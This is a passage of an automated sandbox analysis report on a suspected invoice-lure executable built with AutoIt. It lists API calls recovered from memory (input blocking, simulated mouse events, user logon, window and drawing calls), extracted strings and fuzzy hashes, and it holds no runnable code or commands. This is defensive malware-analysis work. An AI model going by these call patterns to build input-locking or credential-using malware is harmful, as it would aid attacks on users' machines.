                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                              • String ID:
                                                              • API String ID: 2893107130-0
                                                              • Opcode ID: c546a22755647b284d3408b2fe76d53be42415bc0ffdb1bac2225db6bcd868dd
                                                              • Instruction ID: 49dad183c466f2649c9ca723f8b25a9aab27d7403436998257990b4ed8416d6f
                                                              • Opcode Fuzzy Hash: c546a22755647b284d3408b2fe76d53be42415bc0ffdb1bac2225db6bcd868dd
                                                              • Instruction Fuzzy Hash: 7921A2726345108BC72ACF28D881A92F7E5EB95310B248E6DE0E5CB2C0CB74B955CF94
                                                              APIs
                                                              • BlockInput.USER32(00000001), ref: 00246ACA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BlockInput
                                                              • String ID:
                                                              • API String ID: 3456056419-0
                                                              • Opcode ID: b091108606754323a66e65b74f1c794cda056a66207279ff9d81b5823938253d
                                                              • Instruction ID: a26a2ccd29061004e7c0a5deb761389dcb19f09cef5f30030771c831bf694a14
                                                              • Opcode Fuzzy Hash: b091108606754323a66e65b74f1c794cda056a66207279ff9d81b5823938253d
                                                              • Instruction Fuzzy Hash: 17E0D835210214AFD700EF59E408D56B7EDAF74751F04C417F909D7291CAB0F8048B91
                                                              APIs
                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002374DE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID:
                                                              • API String ID: 2434400541-0
                                                              • Opcode ID: afbe8d68f8b276e42807a2bd93d2516f786cc1f5a226106c9e2676f261cddd48
                                                              • Instruction ID: ed56c09a52d45ef6b663b655aa299314cef3af60ab5b75f44da1021e752c5f9f
                                                              • Opcode Fuzzy Hash: afbe8d68f8b276e42807a2bd93d2516f786cc1f5a226106c9e2676f261cddd48
                                                              • Instruction Fuzzy Hash: 83D05EE017C30639EC381B249C0FF764968F3007C0FC0818AB382C90C3B8C078619132
                                                              APIs
                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0022AD3E), ref: 0022B124
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LogonUser
                                                              • String ID:
                                                              • API String ID: 1244722697-0
                                                              • Opcode ID: fe0e1e4b378d90afdf338948e5d3a29016f1f93380545b62c627c7af01b5f727
                                                              • Instruction ID: 8ac3d25c13dff0aac314850de4cf179be0789b2066f696cded3e73f39be23f35
                                                              • Opcode Fuzzy Hash: fe0e1e4b378d90afdf338948e5d3a29016f1f93380545b62c627c7af01b5f727
                                                              • Instruction Fuzzy Hash: 8CD05E320A460EAEDF024FA4EC06EAE3F6AEB04700F408110FA15D50A0C671D531AB50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0021818F
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3728558374-0
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 0024A2FE
                                                              • DeleteObject.GDI32(00000000), ref: 0024A310
                                                              • DestroyWindow.USER32 ref: 0024A31E
                                                              • GetDesktopWindow.USER32 ref: 0024A338
                                                              • GetWindowRect.USER32(00000000), ref: 0024A33F
                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0024A480
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0024A490
                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A4D8
                                                              • GetClientRect.USER32(00000000,?), ref: 0024A4E4
                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0024A51E
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A540
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A553
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A55E
                                                              • GlobalLock.KERNEL32(00000000), ref: 0024A567
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A576
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0024A57F
                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A586
                                                              • GlobalFree.KERNEL32(00000000), ref: 0024A591
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A5A3
                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0027D9BC,00000000), ref: 0024A5B9
                                                              • GlobalFree.KERNEL32(00000000), ref: 0024A5C9
                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0024A5EF
                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0024A60E
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A630
                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024A81D
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                              • API String ID: 2211948467-2373415609
                                                              APIs
                                                              • SetTextColor.GDI32(?,00000000), ref: 0025D2DB
                                                              • GetSysColorBrush.USER32(0000000F), ref: 0025D30C
                                                              • GetSysColor.USER32(0000000F), ref: 0025D318
                                                              • SetBkColor.GDI32(?,000000FF), ref: 0025D332
                                                              • SelectObject.GDI32(?,00000000), ref: 0025D341
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0025D36C
                                                              • GetSysColor.USER32(00000010), ref: 0025D374
                                                              • CreateSolidBrush.GDI32(00000000), ref: 0025D37B
                                                              • FrameRect.USER32(?,?,00000000), ref: 0025D38A
                                                              • DeleteObject.GDI32(00000000), ref: 0025D391
                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0025D3DC
                                                              • FillRect.USER32(?,?,00000000), ref: 0025D40E
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0025D439
                                                                • Part of subcall function 0025D575: GetSysColor.USER32(00000012), ref: 0025D5AE
                                                                • Part of subcall function 0025D575: SetTextColor.GDI32(?,?), ref: 0025D5B2
                                                                • Part of subcall function 0025D575: GetSysColorBrush.USER32(0000000F), ref: 0025D5C8
                                                                • Part of subcall function 0025D575: GetSysColor.USER32(0000000F), ref: 0025D5D3
                                                                • Part of subcall function 0025D575: GetSysColor.USER32(00000011), ref: 0025D5F0
                                                                • Part of subcall function 0025D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0025D5FE
                                                                • Part of subcall function 0025D575: SelectObject.GDI32(?,00000000), ref: 0025D60F
                                                                • Part of subcall function 0025D575: SetBkColor.GDI32(?,00000000), ref: 0025D618
                                                                • Part of subcall function 0025D575: SelectObject.GDI32(?,?), ref: 0025D625
                                                                • Part of subcall function 0025D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0025D644
                                                                • Part of subcall function 0025D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0025D65B
                                                                • Part of subcall function 0025D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0025D670
                                                                • Part of subcall function 0025D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0025D698
                                                              Similarity
                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 3521893082-0
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0023DBD6
                                                              • GetDriveTypeW.KERNEL32(?,0028DC54,?,\\.\,0028DC00), ref: 0023DCC3
                                                              • SetErrorMode.KERNEL32(00000000,0028DC54,?,\\.\,0028DC00), ref: 0023DE29
                                                              Strings
                                                              Similarity
                                                              • API ID: ErrorMode$DriveType
                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                              • API String ID: 2907320926-4222207086
                                                              • Opcode ID: 16ddddd99e8381660aa0b32188795417aa5a18564245e39de414e6a82fec197a
                                                              • Instruction ID: f0f87b112ef100baa57c824dd331e3ed54465f02a6da78a1f51489798ff40b9f
                                                              • Opcode Fuzzy Hash: 16ddddd99e8381660aa0b32188795417aa5a18564245e39de414e6a82fec197a
                                                              • Instruction Fuzzy Hash: 7D51B6B127830AABC300DF10E942839B7A6FB66B44F144C1AF40797291DFB0D976DB52
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                              • API String ID: 1038674560-86951937
                                                              • Opcode ID: 34444178ed377d55de816340d9f7cffade6c942ebb1205378201b96bdf91ce1f
                                                              • Instruction ID: e080b07ed1c0d1a0d7068cf35a592f44881fab86f47096103769c4cd1a02b98e
                                                              • Opcode Fuzzy Hash: 34444178ed377d55de816340d9f7cffade6c942ebb1205378201b96bdf91ce1f
                                                              • Instruction Fuzzy Hash: 16812A3165020DABDB24BF64CD42FFF77A9AF25300F044024FA05A61C6EB61D9B5DAD0
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0025C788
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0025C83E
                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 0025C859
                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0025CB15
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: 0
                                                              • API String ID: 2326795674-4108050209
                                                              • Opcode ID: 4fe65079b79d7f66d24e3b80c653adb03ad58fe38a055fb8cd6b3bcc3352b05f
                                                              • Instruction ID: 645e45c03b27c32585a51c94bcef320149f909d33d586e8e147360aaff990ecc
                                                              • Opcode Fuzzy Hash: 4fe65079b79d7f66d24e3b80c653adb03ad58fe38a055fb8cd6b3bcc3352b05f
                                                              • Instruction Fuzzy Hash: 58F11970124302AFD7118F24DC49BAABBF8FF49356F24061DF998D62A1E774C868CB95
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,0028DC00), ref: 00256449
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                              • API String ID: 3964851224-45149045
                                                              • Opcode ID: 9263e98623626168dc40438db77b635a8b824ddee7347f5e09b8faa799b6263a
                                                              • Instruction ID: 90cb5c0477a1050f48589273e05ec7cb1351236c8abb00a40696702dcf6c2cec
                                                              • Opcode Fuzzy Hash: 9263e98623626168dc40438db77b635a8b824ddee7347f5e09b8faa799b6263a
                                                              • Instruction Fuzzy Hash: 47C1CC302243468BCB04EF10C445A7EB7A5AF95744F80485DF8865B2E3DB71EDAECB86
                                                              APIs
                                                              • GetSysColor.USER32(00000012), ref: 0025D5AE
                                                              • SetTextColor.GDI32(?,?), ref: 0025D5B2
                                                              • GetSysColorBrush.USER32(0000000F), ref: 0025D5C8
                                                              • GetSysColor.USER32(0000000F), ref: 0025D5D3
                                                              • CreateSolidBrush.GDI32(?), ref: 0025D5D8
                                                              • GetSysColor.USER32(00000011), ref: 0025D5F0
                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0025D5FE
                                                              • SelectObject.GDI32(?,00000000), ref: 0025D60F
                                                              • SetBkColor.GDI32(?,00000000), ref: 0025D618
                                                              • SelectObject.GDI32(?,?), ref: 0025D625
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0025D644
                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0025D65B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0025D670
                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0025D698
                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0025D6BF
                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0025D6DD
                                                              • DrawFocusRect.USER32(?,?), ref: 0025D6E8
                                                              • GetSysColor.USER32(00000011), ref: 0025D6F6
                                                              • SetTextColor.GDI32(?,00000000), ref: 0025D6FE
                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0025D712
                                                              • SelectObject.GDI32(?,0025D2A5), ref: 0025D729
                                                              • DeleteObject.GDI32(?), ref: 0025D734
                                                              • SelectObject.GDI32(?,?), ref: 0025D73A
                                                              • DeleteObject.GDI32(?), ref: 0025D73F
                                                              • SetTextColor.GDI32(?,?), ref: 0025D745
                                                              • SetBkColor.GDI32(?,?), ref: 0025D74F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 1996641542-0
                                                              • Opcode ID: 7b80fef931559acbde3302df17d635f51b1940cda50f3dff55abcc758e78d750
                                                              • Instruction ID: 81834605a0ab7bd6a39528aa2e26aeb23870792b13ec3afb06d930f2bd9a2a10
                                                              • Opcode Fuzzy Hash: 7b80fef931559acbde3302df17d635f51b1940cda50f3dff55abcc758e78d750
                                                              • Instruction Fuzzy Hash: 54514E71900209BFDF10AFA8EC48EAEBB79FF48325F504515F919AB2A1D7759A80CF50
                                                              APIs
                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0025B7B0
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0025B7C1
                                                              • CharNextW.USER32(0000014E), ref: 0025B7F0
                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0025B831
                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0025B847
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0025B858
                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0025B875
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0025B8C7
                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0025B8DD
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0025B90E
                                                              • _memset.LIBCMT ref: 0025B933
                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0025B97C
                                                              • _memset.LIBCMT ref: 0025B9DB
                                                              • SendMessageW.USER32 ref: 0025BA05
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0025BA5D
                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 0025BB0A
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0025BB2C
                                                              • GetMenuItemInfoW.USER32(?), ref: 0025BB76
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0025BBA3
                                                              • DrawMenuBar.USER32(?), ref: 0025BBB2
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0025BBDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                              • String ID: 0
                                                              • API String ID: 1073566785-4108050209
                                                              • Opcode ID: 546d08438b12d4b2b72ea926ad0d9e2c1274a8a657d493e9c3d9d90574d368df
                                                              • Instruction ID: fd694283fac441ff48531868fc606be951009d7aad7788685bc8a41918b2e601
                                                              • Opcode Fuzzy Hash: 546d08438b12d4b2b72ea926ad0d9e2c1274a8a657d493e9c3d9d90574d368df
                                                              • Instruction Fuzzy Hash: 40E1C071920209AFDF219F61DC88EEE7BB8FF05315F108156FD19AA190D7B08AA5CF64
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$Foreground
                                                              • String ID: ACTIVE$ALL$CLASS$H+*$HANDLE$INSTANCE$L+*$LAST$P+*$REGEXPCLASS$REGEXPTITLE$T+*$TITLE
                                                              • API String ID: 62970417-972381662
                                                              • Opcode ID: 8a08a7c6b36ad6f66798ed4e8268c7e50508cd88aa8bfd64743e3b24d4234117
                                                              • Instruction ID: 8df087b0a2371c88795cc9f0c8dfb92bbdca3873b15b1357650606df20edb22f
                                                              • Opcode Fuzzy Hash: 8a08a7c6b36ad6f66798ed4e8268c7e50508cd88aa8bfd64743e3b24d4234117
                                                              • Instruction Fuzzy Hash: E4D1B330128646DBCB04EF10C881AAABBB4BF64344F104A5DF556575A2DB70E9FECF91
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 0025778A
                                                              • GetDesktopWindow.USER32 ref: 0025779F
                                                              • GetWindowRect.USER32(00000000), ref: 002577A6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00257808
                                                              • DestroyWindow.USER32(?), ref: 00257834
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0025785D
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0025787B
                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002578A1
                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 002578B6
                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002578C9
                                                              • IsWindowVisible.USER32(?), ref: 002578E9
                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00257904
                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00257918
                                                              • GetWindowRect.USER32(?,?), ref: 00257930
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00257956
                                                              • GetMonitorInfoW.USER32 ref: 00257970
                                                              • CopyRect.USER32(?,?), ref: 00257987
                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 002579F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                              • String ID: ($0$tooltips_class32
                                                              • API String ID: 698492251-4156429822
                                                              • Opcode ID: a6fcada709005dfa96bcaf58c58c05c8080fe3f52f7f495cc9cd82609c40f194
                                                              • Instruction ID: eb293641d26a1b9a9f54c47147273576675841d8dae7c64cb7dc62f3e2b81df1
                                                              • Opcode Fuzzy Hash: a6fcada709005dfa96bcaf58c58c05c8080fe3f52f7f495cc9cd82609c40f194
